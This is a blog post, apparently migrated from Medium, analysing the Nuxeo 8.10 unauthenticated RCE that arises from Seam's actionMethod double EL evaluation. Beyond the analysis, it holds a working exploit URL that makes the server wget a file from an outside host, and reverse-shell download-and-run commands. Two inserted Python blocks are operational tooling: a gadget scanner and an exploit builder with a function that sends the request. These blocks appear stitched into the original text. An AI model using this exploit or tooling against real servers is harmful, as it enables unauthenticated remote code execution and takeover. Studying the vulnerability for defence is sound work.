[Old Articles] Nuxeo Unauthenticated RCE analysis

About the <Old Articles> series

The <Old Articles> series collects technical articles I previously posted elsewhere; I picked the ones worth keeping and migrated them to this blog.

Originally published at: hxxps://medium.com/@m01e/nuxeo-unauthenticated-rce-analysis-2f88d412e176

1、Preface

This time, the vulnerability analyzed comes from Orange Tsai's 2018 Black Hat talk <Breaking Parser Logic! Take Your Path Normalization Off and Pop 0days Out>.

2、Set up the environment

First, I'll use docker to set up the lab environment. According to Orange's article, the unauthenticated RCE is in Nuxeo version 8.10.

So, download the Nuxeo 8 docker image:

# docker pull nuxeo:8

Then start the Nuxeo docker image. Port 8080 is the Nuxeo HTTP service and 8787 is Nuxeo's remote debugging port:

# docker run -itd -p38787:8787 -p30223:8080 nuxeo:8

Then enter the Nuxeo container and edit the config file nuxeo/server/bin/nuxeo.conf to enable the remote debugging switch.
[screenshot]
Then install the package nuxeo-jsf-ui, since this component is needed to exploit the vulnerability:

# nuxeo/server/bin/nuxeoctl mp-install nuxeo-jsf-ui

Finally, start the Nuxeo service and open it in the browser:

# nuxeo/server/bin/nuxeoctl start

[screenshots]
Now export the whole Nuxeo server directory /opt/nuxeo/server from the docker container to the local machine.

Then import the whole directory into IDEA as a project, and add all the dependency jars in the bin, lib, nxserver/bundles and nxserver/lib directories to the project.
[screenshot]
Now the lab environment is ready.

3、Vulnerability analysis

Nuxeo is built on the Seam framework, a popular web framework. To control where the browser should be redirected, Seam supports a series of HTTP parameters, and these parameters are where the bugs are. actionMethod is one of them.

actionMethod is a special parameter that invokes a specified JBoss EL (Expression Language) expression from the query string. That sounds dangerous, but several preconditions are checked before the expression is evaluated. The detailed implementation is in the method callAction.
[screenshot]
To invoke JBoss EL through actionMethod, three preconditions must be satisfied:

1. The value of actionMethod must be a pair of the form FILENAME:EL_CODE, and it must not contain # or {.
[screenshots]
2. The FILENAME part must be a real file under the root context /opt/nuxeo/server/nxserver/nuxeo.war.
[screenshot]
3. The file FILENAME must contain the string "#{EL_CODE}" (the double quotes and the #{} wrapper are both required).
[screenshot]
For example, the file login.xhtml is located in the root context /opt/nuxeo/server/nxserver/nuxeo.war/ and contains "#{userDTO.username}":
[screenshots]
As the screenshots above show, you can evaluate that expression via a URL like:

http://your-host/nuxeo/xxx.xhtml?actionMethod=login.xhtml:userDTO.username

Because of these three preconditions, invoking EL this way looks harmless: you don't control the content of FILENAME, so only expressions that already appear in the application's own pages can be evaluated.

But there is an interesting feature of actionMethod=FILENAME:EL_CODE: after EL_CODE is evaluated, if the returned string looks like EL, that string is evaluated again! In other words, if we can control the returned string, we can execute arbitrary EL. See the code screenshot below.
[screenshot]
Here is the detailed call stack:
(1) callAction [Pages.java]
(2) handleOutcome [Pages.java]
(3) handleNavigation [FancyNavigationHandler.java]
(4) handleNavigation [SeamNavigationHandler.java]
(5) interpolateAndRedirect [FacesManager.java]
(6) interpolate [Interpolator.java]
(7) interpolateExpressions [Interpolator.java]
(8) createValueExpression [Expressions.java]

So you need to find a gadget: a page whose whitelisted expression returns a string you control, so that all three preconditions above are met while the result is attacker-supplied.

Here I chose suggest_add_new_directory_entry_iframe.xhtml in the widgets directory under the root context.
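To make the three preconditions and the second evaluation concrete, here is an added Python example (mine, not code from the original post, Seam or Nuxeo). It re-implements the safety check as described above over a constructed stand-in webroot, scans that webroot for gadget pages whose whitelisted expression echoes request data, and lists the #{...} expressions the redirect interpolator would evaluate from an attacker-controlled outcome string. The webroot layout, the two page contents and the regexes are assumptions modelled on the description above, not copies of Nuxeo's files.

```python
"""Added example: emulate Seam's actionMethod safety check and hunt for gadgets.
Not code from the original post, Seam or Nuxeo; file contents are constructed."""
import os
import re
import tempfile

# An actionMethod value is "viewId:expression"; the check described above
# rejects '#' and '{' anywhere in the value, so neither side may contain them.
ACTION_RE = re.compile(r'^([^#{]+):([^#{]+)$')

# What the redirect interpolator looks for in the outcome of the first evaluation.
EL_RE = re.compile(r'#\{(.*?)\}')

# Whitelisted expressions whose result comes straight from the request:
# these pages can serve as the FILE part of a malicious actionMethod.
GADGET_RE = re.compile(r'"#\{([^}"]*request\.get(?:Parameter|Header)\([^}"]*\))\}"')


def is_action_safe(webroot, action_method):
    """The three preconditions: a FILE:EL pair without '#' or '{', FILE an
    existing file under the webroot, and the literal string "#{EL}" (quotes
    included) present in that file."""
    m = ACTION_RE.match(action_method)
    if not m:
        return False
    view_id, expression = m.groups()
    root = os.path.abspath(webroot)
    path = os.path.abspath(os.path.join(root, view_id.lstrip('/')))
    # stay inside the webroot; the real check resolves the view through the ServletContext
    if not path.startswith(root + os.sep) or not os.path.isfile(path):
        return False
    with open(path, encoding='utf-8', errors='replace') as fh:
        return '"#{%s}"' % expression in fh.read()


def second_stage_expressions(outcome):
    """Expressions the interpolator would evaluate with full privileges when
    the *result* of the whitelisted expression itself contains #{...}."""
    return EL_RE.findall(outcome)


def find_gadgets(webroot):
    """Walk *.xhtml files under webroot and return (relative path, expression)
    for every whitelisted expression that echoes request-controlled data."""
    hits = []
    root = os.path.abspath(webroot)
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith('.xhtml'):
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding='utf-8', errors='replace') as fh:
                for expr in GADGET_RE.findall(fh.read()):
                    rel = os.path.relpath(full, root).replace(os.sep, '/')
                    hits.append((rel, expr))
    return sorted(hits)


def build_sample_webroot():
    """Constructed stand-in for nuxeo.war with two pages modelled on the ones
    discussed above (contents are illustrative, not copied from Nuxeo)."""
    root = tempfile.mkdtemp(prefix='nuxeo-war-')
    os.makedirs(os.path.join(root, 'widgets'))
    with open(os.path.join(root, 'login.xhtml'), 'w', encoding='utf-8') as fh:
        fh.write('<h:inputText value="#{userDTO.username}" />\n')
    gadget = os.path.join(root, 'widgets', 'suggest_add_new_directory_entry_iframe.xhtml')
    with open(gadget, 'w', encoding='utf-8') as fh:
        fh.write('<c:set var="dirName" value="#{request.getParameter(\'directoryNameForPopup\')}" />\n')
    return root


if __name__ == '__main__':
    root = build_sample_webroot()
    print(is_action_safe(root, 'login.xhtml:userDTO.username'))
    print(is_action_safe(root, "login.xhtml:''['class'].forName('java.lang.Runtime')"))
    for view, expr in find_gadgets(root):
        print('gadget:', view, expr)
    # the attacker controls the outcome through the gadget's request parameter
    print(second_stage_expressions("/?key=#{request.setAttribute('x', 1)}"))
```

Running find_gadgets against a real unpacked nuxeo.war is the quickest way to enumerate every page that satisfies the check while handing back request data; each hit is a candidate FILE:EL pair for the first stage.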

4、Exploit

http://vulfocus.me:30223/nuxeo/create_file.xhtml?
actionMethod=widgets/suggest_add_new_directory_entry_iframe.xhtml:request.getParameter('directoryNameForPopup')
&directoryNameForPopup=/?key=#
{request.setAttribute('methods',''['class'].forName('java.lang.Runtime').getDeclaredMethods())---request.getAttribute('methods')[15].invoke(request.getAttribute('methods')[7].invoke(null),'wget http://192.168.3.2:8384/note.py')}
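As an added example (mine, not the post's pocsuite3 exploit and not Orange's code), the following Python assembles the same request as the URL above with correct percent-encoding, decodes it back the way the servlet container will, and refuses commands that Runtime.exec(String) cannot run. The host, the gadget page, the method indices 15 and 7 and the wget command are taken from the PoC above; Java does not specify the order of getDeclaredMethods(), so the two indices are parameters to be confirmed on the target JVM rather than constants.

```python
"""Added example: build and sanity-check the Nuxeo actionMethod exploit URL.
Not the post's pocsuite3 exploit nor Orange's code."""
from urllib.parse import quote, urlencode, urlsplit, parse_qs
import urllib.request

GADGET = "widgets/suggest_add_new_directory_entry_iframe.xhtml"
PAGE = "create_file.xhtml"
# Runtime.exec(String) runs no shell, and the command sits inside an EL string
# literal, so these characters either break the literal or silently do nothing.
BAD_CHARS = set("|&;<>$`'\"\n")


def build_el_payload(cmd, exec_index=15, getruntime_index=7):
    """Second-stage EL from the PoC above. The indices into
    Runtime.getDeclaredMethods() come from the PoC; Java leaves the order of
    that array unspecified, so confirm both on the target JVM."""
    bad = sorted(BAD_CHARS.intersection(cmd))
    if bad:
        raise ValueError("exec(String) cannot run this command, drop %s: %r" % (bad, cmd))
    return (
        "/?key=#{request.setAttribute('methods',''['class']"
        ".forName('java.lang.Runtime').getDeclaredMethods())"
        "---request.getAttribute('methods')[%d].invoke("
        "request.getAttribute('methods')[%d].invoke(null),'%s')}"
        % (exec_index, getruntime_index, cmd)
    )


def build_exploit_url(base, cmd, gadget=GADGET, page=PAGE):
    """Assemble the URL. quote() with safe='' percent-encodes '#', '{', '}',
    '/', '+' and spaces; a bare '#' would be taken as a URL fragment by any
    HTTP client and never reach Nuxeo."""
    params = {
        "actionMethod": "%s:request.getParameter('directoryNameForPopup')" % gadget,
        "directoryNameForPopup": build_el_payload(cmd),
    }
    query = urlencode(params, quote_via=quote, safe="")
    return "%s/nuxeo/%s?%s" % (base.rstrip("/"), page, query)


def server_side_view(url):
    """Decode the query the way the servlet container will: returns the
    (actionMethod, directoryNameForPopup) pair that Seam's callAction sees."""
    qs = parse_qs(urlsplit(url).query)
    return qs["actionMethod"][0], qs["directoryNameForPopup"][0]


def fire(url, timeout=10):
    """Send the request. The command runs server-side, so the HTTP status alone
    says little; check the listener for the wget hit. Needs network access."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status


if __name__ == "__main__":
    url = build_exploit_url("http://vulfocus.me:30223", "wget http://192.168.3.2:8384/note.py")
    print(url)
    print(server_side_view(url))
```

Pasting the raw URL above into a browser or curl without encoding loses everything after the first #, which is the most common reason this PoC appears not to work; server_side_view is there to confirm the two parameters survive the round trip before anything is sent.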

[screenshots]
In addition, I have uploaded an exploit based on the pocsuite3 framework to GitHub. Running it gives the result shown in the screenshot below:
[screenshot]

4.1 About Orange’s PoC

You may be confused if you have read Orange's PoC for this bug. His PoC is shown below.
[screenshot]
First, why is there no /login.jsp;/..;/ in my PoC? Actually, to exploit this vulnerability you don't need to bypass the ACL at all: Nuxeo calls callAction to handle the actionMethod parameter whenever it appears in the URL.

But that ACL bypass technique opened my mind!

Secondly, in the PoC, request.getAttribute('methods')[15] refers to the Runtime.getRuntime().exec(String cmd) method. If cmd='curl orange.tw/bc.pl | perl -', the PoC won't work, because in Java Runtime.getRuntime().exec(String cmd) does not go through a shell: it splits the string on whitespace with a StringTokenizer and executes the first token directly, so | and perl - are handed to curl as ordinary arguments. Note also that the indices 15 and 7 depend on the order in which getDeclaredMethods() returns Runtime's methods, which Java leaves unspecified, so they should be confirmed against the target's JVM.

If you want to use a pipe to get a reverse shell, you should invoke Runtime.getRuntime().exec(String[] cmd) and let a shell parse the command line. For example, in Java:

// -O - makes wget write the download to stdout; without it nothing reaches the pipe
String[] cmd = {"/bin/bash", "-c", "wget -O - http://xxx/note.py | python -"};
Runtime.getRuntime().exec(cmd);

But I failed when I tried to invoke Runtime.getRuntime().exec(String[] cmd) to exploit this vulnerability, because cmd is an array, which puts {} symbols in the PoC.

For now I can't solve this problem, so I get a reverse shell in two steps:
(1) wget http://xxx/rshell.py
(2) python rshell.py

If you're interested, you can try to solve it.

References

[1] http://blog.orange.tw/2018/08/how-i-chained-4-bugs-features-into-rce-on-amazon.html
[2] http://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
